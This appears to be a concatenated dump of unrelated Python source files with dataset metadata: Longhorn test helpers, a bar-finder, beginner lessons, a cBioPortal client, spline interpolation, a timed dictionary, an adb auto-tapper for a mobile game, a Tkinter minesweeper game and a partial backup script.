\"starting\"\nPROC_STATE_RUNNING = \"running\"\nPROC_STATE_STOPPING = \"stopping\"\nPROC_STATE_STOPPED = \"stopped\"\nPROC_STATE_ERROR = \"error\"\n\nTEST_PREFIX = dict(os.environ)[\"TESTPREFIX\"]\nVOLUME_NAME_BASE = TEST_PREFIX + \"instance-volume-\"\nENGINE_NAME_BASE = TEST_PREFIX + \"instance-engine-\"\nREPLICA_NAME_BASE = TEST_PREFIX + \"instance-replica-\"\n\n\n@pytest.fixture()\ndef em_client(request, address=INSTANCE_MANAGER):\n c = EngineManagerClient(address)\n request.addfinalizer(lambda: cleanup_engine(c))\n return cleanup_engine(c)\n\n\ndef cleanup_engine(client):\n for _, engine in iter(client.engine_list().items()):\n delete_engine_process(client, engine.spec.name)\n for i in range(RETRY_COUNTS):\n es = client.engine_list()\n if len(es) == 0:\n break\n time.sleep(RETRY_INTERVAL)\n\n es = client.engine_list()\n assert len(es) == 0\n return client\n\n\n@pytest.fixture()\ndef pm_client(request, address=INSTANCE_MANAGER):\n c = ProcessManagerClient(address)\n request.addfinalizer(lambda: cleanup_process(c))\n return cleanup_process(c)\n\n\ndef cleanup_process(client):\n cleanup_engine(EngineManagerClient(client.address))\n for name in 
client.process_list():\n delete_replica_process(client, name)\n for i in range(RETRY_COUNTS):\n ps = client.process_list()\n if len(ps) == 0:\n break\n time.sleep(RETRY_INTERVAL)\n\n ps = client.process_list()\n assert len(ps) == 0\n return client\n\n\ndef wait_for_process_running(client, name, type):\n healthy = False\n for i in range(RETRY_COUNTS):\n if type == INSTANCE_MANAGER_TYPE_ENGINE:\n e = client.engine_get(name)\n state = e.status.process_status.state\n elif type == INSTANCE_MANAGER_TYPE_REPLICA:\n state = client.process_get(name).status.state\n else:\n # invalid type\n assert False\n\n if state == PROC_STATE_RUNNING:\n healthy = True\n break\n elif state != PROC_STATE_STARTING:\n # invalid state\n assert False\n time.sleep(RETRY_INTERVAL)\n assert healthy\n\n\ndef create_replica_process(client, name, dir,\n binary=LONGHORN_BINARY,\n size=SIZE, port_count=15,\n port_args=[\"--listen,localhost:\"]):\n client.process_create(\n name=name, binary=binary,\n args=[\"replica\", dir, \"--size\", str(size)],\n port_count=port_count, port_args=port_args)\n wait_for_process_running(client, name,\n INSTANCE_MANAGER_TYPE_REPLICA)\n\n return client.process_get(name)\n\n\ndef delete_engine_process(client, name):\n try:\n client.engine_delete(name)\n except grpc.RpcError as e:\n if 'cannot find engine' not in e.details():\n raise e\n\n\ndef delete_replica_process(client, name):\n try:\n client.process_delete(name)\n except grpc.RpcError as e:\n if 'cannot find process' not in e.details():\n raise e\n\n\ndef get_replica_address(r):\n return \"localhost:\" + str(r.status.port_start)\n\n\ndef wait_for_process_deletion(client, name):\n deleted = False\n for i in range(RETRY_COUNTS):\n rs = client.process_list()\n if name not in rs:\n deleted = True\n break\n time.sleep(RETRY_INTERVAL)\n assert deleted\n\n\ndef wait_for_engine_deletion(client, name):\n deleted = False\n for i in range(RETRY_COUNTS):\n es = client.engine_list()\n if name not in es:\n deleted = True\n break\n time.sleep(RETRY_INTERVAL)\n assert deleted\n\n\ndef create_engine_process(client, name, volume_name,\n replicas, binary=LONGHORN_BINARY,\n listen=\"\", listen_ip=\"localhost\",\n size=SIZE, frontend=\"tgt-blockdev\"):\n client.engine_create(\n name=name, volume_name=volume_name,\n binary=binary, listen=listen, listen_ip=listen_ip,\n size=size, frontend=frontend, replicas=replicas)\n wait_for_process_running(client, name,\n INSTANCE_MANAGER_TYPE_ENGINE)\n\n return client.engine_get(name)\n\n\ndef get_dev_path(volume_name):\n return os.path.join(\"/dev/longhorn/\", volume_name)\n\n\ndef check_dev_existence(volume_name):\n found = False\n for i in range(RETRY_COUNTS):\n if os.path.exists(get_dev_path(volume_name)):\n found = True\n break\n time.sleep(RETRY_INTERVAL)\n assert found\n\n\ndef wait_for_dev_deletion(volume_name):\n found = True\n for i in range(RETRY_COUNTS):\n if not os.path.exists(get_dev_path(volume_name)):\n found = False\n break\n time.sleep(RETRY_INTERVAL)\n assert not found\n","sub_path":"integration/instance/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452187900","text":"import requests\nimport json\nimport sys\n\n\ndef get_bar_name(bar):\n return bar['properties']['Attributes']['Name']\n\n\ndef get_bar_seatscount(bar):\n return bar['properties']['Attributes']['SeatsCount']\n\n\ndef get_bar_coordinates(bar):\n return bar['geometry']['coordinates']\n\n\ndef get_default_latlng():\n 
moscow_coordinates = [55.7558, 37.6173]\n try:\n response = requests.get('https://api.userinfo.io/userinfos')\n user_data = response.json()\n position = user_data['position']\n if position['latitude'] is None or position['longitude'] is None:\n raise ValueError(\"Error on detecting positon\")\n return [position['latitude'], position['longitude']]\n except requests.exceptions.RequestException as e:\n return moscow_coordinates\n except ValueError:\n return moscow_coordinates\n\n\ndef get_distance(coordinates1, coordinates2):\n [lat1, lng1] = coordinates1\n [lat2, lng2] = coordinates2\n lat_distance = abs(lat1 - lat2)\n lng_distance = abs(lng1 - lng2)\n return (lat_distance ** 2 + lng_distance ** 2) ** 0.5\n\n\ndef load_data(filepath):\n with open(filepath) as filepointer:\n return json.load(filepointer)['features']\n\n\ndef coordinates_to_str(coordinates):\n return ','.join(map(str, coordinates))\n\n\ndef get_biggest_bar(bars_data):\n return max(bars_data, key=get_bar_seatscount)\n\n\ndef get_smallest_bar(bars_data):\n return min(bars_data, key=get_bar_seatscount)\n\n\ndef get_closest_bar(bars_data, longitude, latitude):\n return min(\n bars_data,\n key=lambda x: get_distance(\n get_bar_coordinates(x), [latitude, longitude])\n )\n\n\ndef print_bar(bar):\n return \"`{}` (seat(s) - {}, coordinates - {})\".format(\n get_bar_name(bar),\n get_bar_seatscount(bar),\n coordinates_to_str(get_bar_coordinates(bar))\n )\n\n\ndef request_user_coordinates():\n default_latlng_str = coordinates_to_str(get_default_latlng())\n latlng_str = input('''\n Your coordinates in format `lat, lng` or just press enter\n We detected your coordinates as `{}` - '''.strip().format(\n default_latlng_str)) or default_latlng_str\n\n return map(lambda x: float(x.strip()), latlng_str.split(','))\n\n\ndef load_bars_data(filename):\n try:\n return load_data(filename)\n except FileNotFoundError:\n return None\n except json.decoder.JSONDecodeError:\n return None\n\n\nif __name__ == '__main__':\n if (len(sys.argv) < 2):\n sys.exit(\"Please pass filename as param\")\n\n filename = sys.argv[1]\n\n bars_data = load_bars_data(filename)\n\n if bars_data is None:\n sys.exit(\"Please pass correct json file name\")\n\n try:\n [lat, lng] = request_user_coordinates()\n except ValueError:\n sys.exit(\"Please enter coordinates in correct format\")\n\n biggest_bar = get_biggest_bar(bars_data)\n smallest_bar = get_smallest_bar(bars_data)\n closest_bar = get_closest_bar(bars_data, lat, lng)\n\n print('Biggest bar is `{}`'.format(print_bar(biggest_bar)))\n print('Smallest bar is `{}`'.format(print_bar(smallest_bar)))\n print('Closest bar is `{}`'.format(print_bar(closest_bar)))\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"602532049","text":"#frist lesson\nprint (\"My first Python code!\")\nprint (\"easier than i expected\")\n#second lesson\nprint (\"not a comment\")\n#print (\"Am a comment\")\n#third lesson \n'''\nprint (\"we are in a comment\")\nprint (\"we are still in a comment\")\n'''\nprint (\"We are out of a comment\")\n#fourth lesson\na=0\nb=2 \nprint (a + b)\nc=\"0\"\nd=\"2\"\nprint(c + d)\ne = \"0\"\nf = 2\nprint (int(e) + f)\ng=20 \nif g >= 22:\n print(\"if\")\nelif g >= 21:\n print(\"elif\")\nelse:\n print(\"else\")\nprint(\"Now for something completly different\")\n#functions \ndef someFunction():\n print(\"In the function\")\n print(\"Still in the function\")\nsomeFunction() \ndef 
someFunctionToo(h, i):\n print(h+i)\nsomeFunctionToo(12,451) \n#for loops \n#all the way up to and not including the number 1-3 means 1,2 and not 3\nfor j in range(1,3):\n print (j)\nk=1\n#while loops can be used for state driven items \nwhile k < 10:\n print (k)\n k+=1\n#strings \nmyString = \"\"\nprint (type(myString))\naa = \"string\"\nprint (aa[1:3])\nprint (aa[:-1])\n#lists \nsampleList = [1,2,3,4,5,6,7,8]\nprint (sampleList[1])\nsampleListToo = [1,2,3,4,5,6,7,8]\nfor ab in sampleListToo:\n print (ab)\n \n #list \nmyList = [1,2,3]\nmyList.append(4)\nprint (myList)\n#tuple \nmyTuple = (1,2,3)\nprint (myTuple)\n#dictionary \nmyExample = {'someItem': 2, 'otherItem': 20}\nprint(myExample['otherItem'])\nmyExample['newItem'] = 400\nfor a in myExample:\n print (a, myExample[a])\n#formatting\nprint('The order total comes to %f' % 123.44)\nprint('The order total comes to %.2f' % 123.444) \nac =\"abcdefghijklmnopqrstuvwxyz\"\nprint('%.20s' % ac)\n\n# exceptions \nvar1 = \"1\"\ntry:\n var1 = var1 + 1 # since var1 is a string, it cannot be added to the number 1\nexcept:\n print(var1, \" is not a number\") #so we execute this\nprint(var1)\n\nvar2 = \"1\"\ntry:\n var3 = var2 + 1 # since var1 is a string, it cannot be added to the number 1\nexcept:\n var3 = int(var2) + 1\nelse:\n print(var2, \" is not a number\") #so we execute this\nprint(var3)\n\n#file reading \nff = open(\"text.txt\", \"r\") #opens file with name of \"text.txt\"\n#print(ff.read(1))\n#print(ff.read())\n#print(ff.readline())\n#print(ff.readline())\nmyList = []\nfor line in ff:\n myList.append(line)\nprint(myList)\nff.close()\n\n#file writing\nrf = open(\"newtest.txt\",\"w\") #opens file with name of \"newtest.txt\"\nrf.write(\"I am a test file.\\n\")\nrf.write(\"Maybe someday, he will promote me to a real file.\\n\")\nrf.write(\"Man, I long to be a real file\\n\")\nrf.write(\"and hang out with all my new real file friends.\\n\")\nrf.close()\n\n#appending to a file \naf = open(\"newtest.txt\",\"a\") #opens file with name of \"test.txt\"\naf.write(\"and can I get some pickles on that\")\naf.close()","sub_path":"Code/Tools/lesson001.py","file_name":"lesson001.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"23277825","text":"import urllib, urllib2\nimport pandas\nimport numpy\nimport StringIO\n\ncbio_url = 'http://www.cbioportal.org/webservice.do'\n\ndef send_request(data, skiprows=None):\n '''\n Sends a web service requrest to the cBio portal with arguments given in\n the dictionary data and returns a Pandas data frame on success.\n '''\n data_str = urllib.urlencode(data)\n req = urllib2.Request(cbio_url, data_str)\n res = urllib2.urlopen(req)\n data_frame = pandas.read_csv(res, sep='\\t', skiprows=skiprows)\n return data_frame\n\ndef get_mutations(study_id, gene_list_str, mutation_type=None):\n '''\n Get mutations in a given list of genes for a given study filtered\n to a mutation type if needed.\n mutation_type can be: missense, nonsense, frame_shift_ins,\n frame_shift_del, splice_site\n '''\n genetic_profile = get_genetic_profiles(study_id, 'mutation')[0]\n\n data = {'cmd': 'getMutationData',\n 'case_set_id': study_id,\n 'genetic_profile_id': genetic_profile,\n 'gene_list': gene_list_str}\n df = send_request(data, skiprows=1)\n res = _filter_data_frame(df, ['gene_symbol', 'amino_acid_change'],\n 'mutation_type', mutation_type)\n mutations = {'gene_symbol': res['gene_symbol'].values(),\n 'amino_acid_change': 
res['amino_acid_change'].values()}\n return mutations\n\ndef get_num_sequenced(study_id):\n '''\n Get the number of sequenced tumors in a given study. This is useful\n for calculating mutation statistics.\n '''\n data = {'cmd': 'getCaseLists',\n 'cancer_study_id': study_id}\n df = send_request(data)\n row_filter = df['case_list_id'].str.contains('sequenced', case=False)\n num_case = len(df[row_filter]['case_ids'].tolist()[0].split(' '))\n return num_case\n\ndef get_genetic_profiles(study_id, filter_str=None):\n '''\n Get the list of all genetic profiles for a given study. The genetic\n profiles include mutations, rppa, methylation, etc.\n '''\n data = {'cmd': 'getGeneticProfiles',\n 'cancer_study_id': study_id}\n df = send_request(data)\n res = _filter_data_frame(df, ['genetic_profile_id'],\n 'genetic_alteration_type', filter_str)\n genetic_profiles = res['genetic_profile_id'].values()\n return genetic_profiles\n\ndef get_cancer_studies(filter_str=None):\n '''\n Get the list of all cancer studies that have filter_str\n in their id. There are typically multiple studies for\n a given type of cancer.\n '''\n data = {'cmd': 'getCancerStudies'}\n df = send_request(data)\n df.to_csv('cbio_cancer_studies.tsv', sep='\\t', index=False)\n res = _filter_data_frame(df, ['cancer_study_id'],\n 'cancer_study_id', filter_str)\n study_ids = res['cancer_study_id'].values()\n return study_ids\n\ndef get_cancer_types(filter_str=None):\n '''\n Get the list of all cancer types that have filter_str\n in their name.\n '''\n data = {'cmd': 'getTypesOfCancer'}\n df = send_request(data)\n df.to_csv('cbio_cancer_types.tsv', sep='\\t', index=False)\n res = _filter_data_frame(df, ['type_of_cancer_id'], 'name', filter_str)\n type_ids = res['type_of_cancer_id'].values()\n return type_ids\n\ndef _filter_data_frame(df, data_col, filter_col, filter_str=None):\n '''\n Filter a column of a data frame for a given string\n and return the corresponding rows of the data column as a dictionary.\n '''\n if filter_str is not None:\n relevant_cols = data_col + [filter_col]\n df.dropna(inplace=True, subset=relevant_cols)\n row_filter = df[filter_col].str.contains(filter_str, case=False)\n data_list = df[row_filter][data_col].to_dict()\n else:\n data_list = df[data_col].to_dict()\n return data_list\n","sub_path":"bioagents/databases/cbio_client.py","file_name":"cbio_client.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"182049914","text":"import requests\r\nimport json\r\n\r\n#Get Key\r\n#This is a file not in my respository I don't want you to have it\r\nfile = open(\"..//..//API_Keys//fixerkey.txt\",\"r\")\r\n#Tool to read the contents of a file into a list\r\nkey = file.read()\r\n\r\n\r\nresp = requests.get('http://data.fixer.io/api/latest?access_key='+key)\r\n\r\n#Converts response to JSON\r\ndata = resp.json()\r\nprint(data[\"base\"])\r\nprint(data[\"rates\"][\"USD\"])\r\n\r\n#print(data)","sub_path":"DP_CS_Code/API_Demo/fixerAPIcall.py","file_name":"fixerAPIcall.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"623236160","text":"# python imports\nimport warnings\nimport traceback\nfrom typing import Union\n\n# third party imports\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom scipy.linalg import solve_banded\n\n# fcspline import\ntry:\n from . 
import fcs_c\n HAS_FCS_C = True\nexcept ImportError as e:\n warnings.warn(\"could not import cython extension 'fcs_c' -> use pure Python variant\")\n warnings.warn(f\"ImportError: {e}\")\n traceback.print_exc()\n HAS_FCS_C = False\n\n\ndef _intp(x: float, x_low: float, dx: float, y: NDArray, ypp: NDArray, n: int) -> Union[float, complex]:\n \"\"\"\n cubic spline interpolation formula, specific for equally spaced x-values\n\n adapted from, Ch. 3.3 pp 120\n\n Press, W.H., Teukolsky, S.A., Vetterling, W.T., Flannery, B.P., 2007.\n Numerical Recipes 3rd Edition: The Art of Scientific Computing,\n Auflage: 3. ed. Cambridge University Press, Cambridge, UK; New York.\n\n\n Parameters:\n x:\n point at which to evaluate the spline\n x_low:\n lowest value of the x-axes, i.e., f(x_low) = y[0]\n dx:\n the spacing of the x values, i.e., dx =x[i+1] - x[i]\n y:\n the y values y[i] = f(x[i])\n ypp:\n the second derivative of the cubic spline at the points x[i], it follows\n consistently by solving a tri-diagonal eigenvalue equation\n n:\n size of the y values\n\n Returns:\n the value of the cubic spline at x\n \"\"\"\n j = int((x-x_low) / dx)\n if j < 0:\n j = 0\n elif j >= n - 1:\n j = n - 2\n x_jp1 = x_low + (j + 1) * dx\n\n a = (x_jp1 - x) / dx\n b = 1 - a\n\n c = 1 / 6 * (a ** 3 - a) * dx ** 2\n d = 1 / 6 * (b ** 3 - b) * dx ** 2\n\n return a * y[j] + b * y[j + 1] + c * ypp[j] + d * ypp[j + 1]\n\n\ndef _intp_array(x: NDArray, x_low: float, dx: float, y: NDArray, ypp: NDArray, n: int) -> NDArray:\n \"\"\"\n call the interpolation for an array of x values\n\n Same parameters as in `_intp`\n\n Parameters:\n x:\n points at which to evaluate the spline\n x_low:\n lowest value of the x-axes, i.e., f(x_low) = y[0]\n dx:\n the spacing of the x values, i.e., dx =x[i+1] - x[i]\n y:\n the y values y[i] = f(x[i])\n ypp:\n the second derivative of the cubic spline at the points x[i], it follows\n consistently by solving a tri-diagonal eigenvalue equation\n n:\n size of the y values\n\n Returns:\n the values of the cubic spline at x-values\n \"\"\"\n res = np.empty(shape=x.shape, dtype=y.dtype)\n for i, xi in enumerate(x):\n res[i] = _intp(xi, x_low, dx, y, ypp, n)\n return res\n\n\n# check https://en.wikipedia.org/wiki/Finite_difference_coefficient#Forward_and_backward_finite_difference\ndef snd_finite_diff(y, dx, _ord):\n if _ord == 1:\n return (y[0] - 2*y[1] + y[2]) / dx**2\n elif _ord == 2:\n if len(y) < 4:\n raise RuntimeError(\"need at least 4 data points to estimate curvature of order 2\")\n return (2*y[0] - 5*y[1] + 4*y[2] - y[3]) / dx**2\n elif _ord == 3:\n if len(y) < 5:\n raise RuntimeError(\"need at least 5 data points to estimate curvature of order 3\")\n return (35/12*y[0] - 26/3*y[1] + 19/2*y[2] - 14/3*y[3] + 11/12*y[4]) / dx**2\n else:\n raise ValueError(\"order must be 1, 2 or 3!\")\n \n\nclass FCS(object):\n def __init__(self, x_low, x_high, y, ypp_specs=None, use_pure_python = False):\n if x_high <= x_low:\n raise ValueError(\"x_high must be greater that x_low\")\n self.x_low = x_low\n\n if np.iscomplexobj(y[0]):\n self.y = np.asarray(y, dtype=np.complex128)\n self.dtype = np.complex128\n else:\n self.y = np.asarray(y, dtype=np.float64)\n self.dtype = np.float64\n\n if self.y.ndim > 1:\n raise ValueError(\"y must be 1D\")\n\n self.n = len(y)\n self.dx = (x_high - x_low) / (self.n-1)\n\n if ypp_specs is None:\n self.ypp_l = 0\n self.ypp_h = 0\n elif isinstance(ypp_specs, tuple):\n self.ypp_l = ypp_specs[0]\n self.ypp_h = ypp_specs[1]\n elif isinstance(ypp_specs, int):\n self.ypp_l = 
snd_finite_diff(self.y, self.dx, ypp_specs)\n self.ypp_h = snd_finite_diff(self.y[::-1], self.dx, ypp_specs)\n else:\n raise ValueError(\"unrecognized ypp_specs of type '{}'\".format(type(ypp_specs)))\n\n self.ypp = self._get_ypp()\n\n # pad with dummy zero to avoid index error\n self.y = np.hstack((self.y, [0]))\n self.ypp = np.hstack((self.ypp, [0]))\n\n if HAS_FCS_C and not use_pure_python:\n if self.dtype == np.complex128:\n self.intp = fcs_c.intp_cplx\n self.intp_array = fcs_c.intp_cplx_array\n else:\n self.intp = fcs_c.intp\n self.intp_array = fcs_c.intp_array\n else:\n if HAS_FCS_C:\n warnings.warn(\"Note: you are using pure python, even though the c extension is avaiable!\")\n self.intp = _intp\n self.intp_array = _intp_array\n\n def _get_ypp(self):\n \"\"\"\n solve the\n :return:\n \"\"\"\n ab = np.zeros(shape=(3, self.n))\n ab[0, 2:] = 1\n ab[1, :] = 4\n ab[2, :-2] = 1\n\n b = np.empty(shape=self.n, dtype=self.dtype)\n b[1:-1] = (self.y[2:] - 2 * self.y[1:-1] + self.y[:-2]) * 6 / self.dx ** 2\n b[0] = 4*self.ypp_l\n b[-1] = 4*self.ypp_h\n\n return solve_banded((1, 1), ab, b)\n\n def __call__(self, x):\n if isinstance(x, np.ndarray):\n res = np.empty(shape=x.shape, dtype=self.dtype)\n flat_res = res.flat\n flat_res[:] = self.intp_array(x.flatten(), self.x_low, self.dx, self.y, self.ypp, self.n)\n return res\n else:\n return self.intp(x, self.x_low, self.dx, self.y, self.ypp, self.n)\n\n\nclass NPointPoly(object):\n def __init__(self, x, y):\n self.x = np.asarray(x)\n self.y = np.asarray(y)\n self.n = len(self.x)\n\n def __call__(self, x):\n C = self.y\n D = self.y\n res = self.y[0]\n for m in range(self.n-1):\n x_i = self.x[:-(m + 1)]\n x_i_m_p1 = self.x[m + 1:]\n D_new = (x_i_m_p1 - x)*(C[1:] - D[:-1]) / (x_i - x_i_m_p1)\n C_new = (x_i - x)*(C[1:] - D[:-1]) / (x_i - x_i_m_p1)\n C = C_new\n D = D_new\n res += C_new[0]\n return res","sub_path":"fastcubicspline/fcs.py","file_name":"fcs.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"458942985","text":"import time\n\n\nclass TimedDict(object):\n def __init__(self, max_size=1024, debug=False):\n self._store = dict()\n self._tmtable = dict()\n self._max_size = max_size\n self._debug = debug\n\n def _inspect_tmtable(self):\n now = int(time.time())\n temp_tmtable = dict()\n for key, ttl in self._tmtable.items():\n if now < ttl:\n temp_tmtable[key] = ttl\n else:\n self._store.pop(key, None)\n self._tmtable = temp_tmtable\n if self._debug and len(self._tmtable) != len(self._store):\n raise RuntimeWarning(\"TimedDict have not equals len of timetable: '{}' and store: '{}'. \"\n .format(len(self._tmtable), len(self._store)))\n\n def add(self, key, data, ttl_sec: int=1) -> bool:\n self._inspect_tmtable()\n if self._max_size < len(self):\n return False\n self._tmtable[key] = ttl_sec + int(time.time())\n self._store[key] = data\n return True\n\n def get(self, key):\n ttl = self._tmtable.get(key, None)\n if ttl and int(time.time()) < ttl:\n return self._store[key]\n\n def pop(self, key):\n self._tmtable.pop(key, None)\n return self._store.pop(key, None)\n\n def __len__(self):\n if self._debug and len(self._tmtable) != len(self._store):\n raise RuntimeWarning(\"TimedDict have not equals len of timetable: '{}' and store: '{}'. 
\"\n .format(len(self._tmtable), len(self._store)))\n return len(self._store)\n\n\nif __name__ == \"__main__\":\n tdict = TimedDict(max_size=1024, debug=True)\n tdict.add(\"qw\", \"qw\", ttl_sec=1)\n print(tdict.get(\"qw\"))\n time.sleep(2)\n print(tdict.get(\"qw\"))\n tdict.add(\"qw1\", \"qw1\", ttl_sec=5)\n print(tdict.get(\"qw1\"))\n time.sleep(2)\n print(tdict.get(\"qw1\"))\n time.sleep(4)\n tdict.add(\"qw2\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw5\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw3\", \"qw2\", ttl_sec=2)\n tdict.add(\"qw4\", \"qw2\", ttl_sec=3)\n print(len(tdict))\n time.sleep(4)\n print(len(tdict))\n print(tdict.get(\"qw1\"))\n","sub_path":"common/timed_dict.py","file_name":"timed_dict.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"200135011","text":"import logging\nimport os\nfrom time import sleep\nimport random\n\n\ndevice_x, device_y = 2160, 1080\nstep_wait = [20, 75]\nrepeat_times = 130\nlogging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\n\n\ndef tap_screen(x, y):\n base_x, base_y = 2160, 1080\n real_x = int(x / base_x * device_x)\n real_y = int(y / base_y * device_y)\n os.system('adb shell input tap {} {}'.format(real_x, real_y))\n\n\ndef do_click():\n logging.debug('#点击闯关')\n tap_screen(1628, 916)\n sleep(random.randint(step_wait[0], step_wait[0]+5))\n\n logging.debug('#攻击')\n for i in range(random.randint(step_wait[1], step_wait[1]+10)):\n tap_screen(1853, 931)\n sleep(random.random()/2)\n\n\nif __name__ == '__main__':\n for i in range(repeat_times):\n logging.info('round #{}'.format(i + 1))\n do_click()\n","sub_path":"toolkits/get_gok_money.py","file_name":"get_gok_money.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"568554813","text":"from random import randint\nfrom tkinter import *\nfrom tkinter import ttk\n\n\ndef putMine(prob):\n if randint(1, prob) == 1:\n return 1\n else:\n return 0\n\n\ndef isvalid(r: int, c: int) -> bool:\n \"\"\"\n Returns true if the coords are within range, false otherwise\n :r: row to check\n :c: column to check\n :return: bool indicating if the coordinates are valid\n \"\"\"\n if r < 0 or r > 9 or c < 0 or c > 9:\n return False\n return True\n\n\ndef count_mines(w: ttk.Widget, r: int, c: int) -> None:\n \"\"\"\n :w: Widget where I need to display the number of mines\n :r: Row where it is located in the list\n :c: Column where it is located in the list\n :return: None\n \"\"\"\n # print(\"DEBUG r/c -> \", r, c)\n global intvars\n mines = 0\n for x in range(-1, 2, 1):\n for y in range(-1, 2, 1):\n print(x, y)\n if isvalid(c+x, r+y):\n print(\"intvar:\", intvars[c+x][r+y].get())\n if intvars[c+x][r+y].get() == 1:\n mines += 1\n w['text'] = mines\n\n\ndef init():\n \"\"\"\n Method that builds the labels and intvars needed for it. 
\n\n\ndef init():\n    \"\"\"\n    Builds the labels and IntVars needed for the board.\n    It is also called when pressing the New Game button.\n    \"\"\"\n    # Variables for initializing the game\n    DIFFICULTY = 10\n    global labels\n    global intvars\n    global readylabel\n    labels = list()\n    intvars = list()\n    readylabel.set(\"Ready to play!\")\n    # Loop for adding the labels\n    for r in range(10):\n        intvars.append([])\n        labels.append([])\n        for c in range(10):\n            intvars[r].append(IntVar())\n            intvars[r][c].set(putMine(DIFFICULTY))\n            labels[r].append(ttk.Label(frame, text=\" \", relief=RAISED, anchor=\"center\"))\n            labels[r][c].grid(row=r, column=c, sticky=\"NSWE\")\n            bind_label(labels[r][c], r, c)\n\n\ndef bind_label(w: ttk.Widget, r: int, c: int) -> None:\n    \"\"\"\n    Binds the label with the events needed to display the amount of bombs next to it\n    :w: Widget to bind\n    :r: Row where the widget is located in the list\n    :c: Column where the widget is located in the list\n    :return: None\n    \"\"\"\n    print(\"Bound label: \", r, c)\n    # hovering shows the neighbour count, leaving clears it, clicking reveals the cell\n    w.bind('<Enter>', lambda e: count_mines(w, r, c))\n    w.bind('<Leave>', lambda e: delete_text(w))\n    w.bind('<Button-1>', lambda e: check_mine(w, r, c))\n\n\ndef check_mine(w: ttk.Widget, r: int, c: int) -> None:\n    \"\"\"\n    Checks if the given mine contains a bomb or not and changes its color based on it\n    :w: Label to check\n    :r: row where the intvar is located in the list\n    :c: column where the intvar is located in the list\n    :return: none\n    \"\"\"\n    global intvars\n    global readylabel\n    if intvars[r][c].get() == 1:\n        w['background'] = 'red'\n        readylabel.set(\"YOU LOSE!!\")\n    else:\n        w['background'] = 'cyan'\n\n\ndef delete_text(w: ttk.Widget) -> None:\n    \"\"\"\n    Deletes the text of the given Widget\n    :w: Widget whose text is going to be deleted\n    :return: None\n    \"\"\"\n    w['text'] = ''\n\n\n# FRAMEWORK\nwindow = Tk()\nwindow.title('Minesweeper')\nwindow.rowconfigure(0, weight=1)\nwindow.columnconfigure(0, weight=1)\n# Creating the frame for the grid\nframe = ttk.Frame(window, padding=8, relief=RAISED)\nframe.grid(column=0, row=0, sticky=N)\n# Lists for holding the IntVars and labels\nlabels = None\nintvars = None\n# Variable for the ready to play label\nreadylabel = StringVar()\n# Call the init method to build the frame\ninit()\n# Adding the label and button on the last row\nttk.Label(frame, textvariable=readylabel, relief=RAISED, anchor=\"center\")\\\n    .grid(row=10, column=0, columnspan=5, sticky=\"NSWE\")\nButton(frame, text=\"New Game\", relief=RAISED, command=init)\\\n    .grid(row=10, column=5, columnspan=5, sticky=\"NSWE\")\n# Loop for setting the size and weights\ncol_count, row_count = frame.grid_size()\nfor col in range(col_count):\n    frame.grid_columnconfigure(col, minsize=30, weight=0)\nfor row in range(row_count):\n    frame.grid_rowconfigure(row, minsize=30, weight=0)\n# Refresh screen and launch it\nwindow.update()\nwindow.minsize(window.winfo_width(), window.winfo_height())\nwindow.mainloop()\n","sub_path":"tKinter/test05/barreiro_tieles.py","file_name":"barreiro_tieles.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"337955759","text":"'''\nCreated by GD\n11.04.2017\nProgram for Backup Moving to RAID removable storage\nv.1 \n'''\n\nfrom datetime import datetime\nimport os\nimport shutil\n\n\ndef checkForRequirements():\n    if os.name != 'nt':\n        exit('Wrong operating system. This program works with Windows NT only')\n
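\n# NOTE: checkEnoughSpace(), copyFiles() and the log helpers below rely on the module-level sourcePath/distPath/logPath names bound in the __main__ block.\n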
\ndef getPathOfSourceFiles():\n    sourcePath = input('Enter source folder path: \\n') + '\\\\'\n    distPath = input('Enter destination folder path: \\n') + '\\\\'\n    logPath = input('Enter log folder path: \\n') + '\\\\'\n    sourcePath = sourcePath.strip().lower()\n    distPath = distPath.strip().lower()\n    logPath = logPath.strip().lower()\n    if logPath == '\\\\':\n        logPath = distPath\n    if sourcePath == '\\\\' or distPath == '\\\\':\n        '''\n        sourcePath = 'C:\\\\inc\\\\'\n        distPath = 'D:\\\\inc\\\\'\n        logPath = 'D:\\\\inc\\\\'\n        return sourcePath, distPath, logPath\n        '''\n        exit('Empty path')\n    else:\n        return sourcePath, distPath, logPath\n\n\ndef checkFreeSpaceOnDisk(distPath):\n    return shutil.disk_usage(distPath).free\n\n\ndef checkCommonFilesSize(sourcePath, distPath):\n    commonSize = 0\n    for i in os.listdir(sourcePath):\n        s = sourcePath + i\n        d = distPath + i\n        if os.path.isfile(s):\n            if not os.path.exists(d):\n                commonSize += int(os.path.getsize(s))\n        else:\n            s += '\\\\'\n            d += '\\\\'\n            commonSize += checkCommonFilesSize(s, d)\n    return commonSize\n\n\ndef checkEnoughSpace(freeDiskSpace, filesVolume):\n    createLogFile(logPath)\n    if freeDiskSpace > filesVolume:\n        copyFiles(sourcePath, distPath)\n    else:\n        writeErrorToLog('Not enough disk space')\n        exit('Not enough disk space')\n    endLog()\n\n\ndef copyFiles(sourcePath, distPath):\n    for 